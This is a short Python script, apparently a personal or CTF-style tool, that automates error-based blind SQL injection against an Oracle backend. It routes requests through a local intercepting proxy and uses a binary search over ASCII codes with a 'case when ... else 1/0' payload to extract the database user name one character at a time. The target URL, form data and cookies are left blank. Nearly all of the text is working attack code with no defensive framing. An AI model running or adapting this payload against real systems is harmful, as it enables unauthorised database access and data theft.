proxies = { 
    'http':'http://127.0.0.1:8080', 
    
} 
session = requests.session() 
session.cookies.set('','') 
 
 
 
def req(session, sql): 
    url = '' 
    data={ 
     
    } 
    res = session.post(url, data=data, proxies=proxies)   
    if '' not in res.text: 
        return True 
    else: 
        return False 
 
         
 
def get_dbuser(length): 
    extract_strs = "" 
    for indx in range(1, length+1): 
        low = 32 
        high = 127 
        while low <= high: 
            mid = (low + high) // 2 
            query = f"(case when (select ascii(substr(user, {indx}, 1)) from dual) > {mid} then 1 else 1/0 end)" 
            time.sleep(0.5) 
            if req(session, query): 
                low = mid + 1 
            else: 
                high = mid - 1 
        extract_strs += chr(high+1) 
        print(extract_strs) 
    return extract_strs
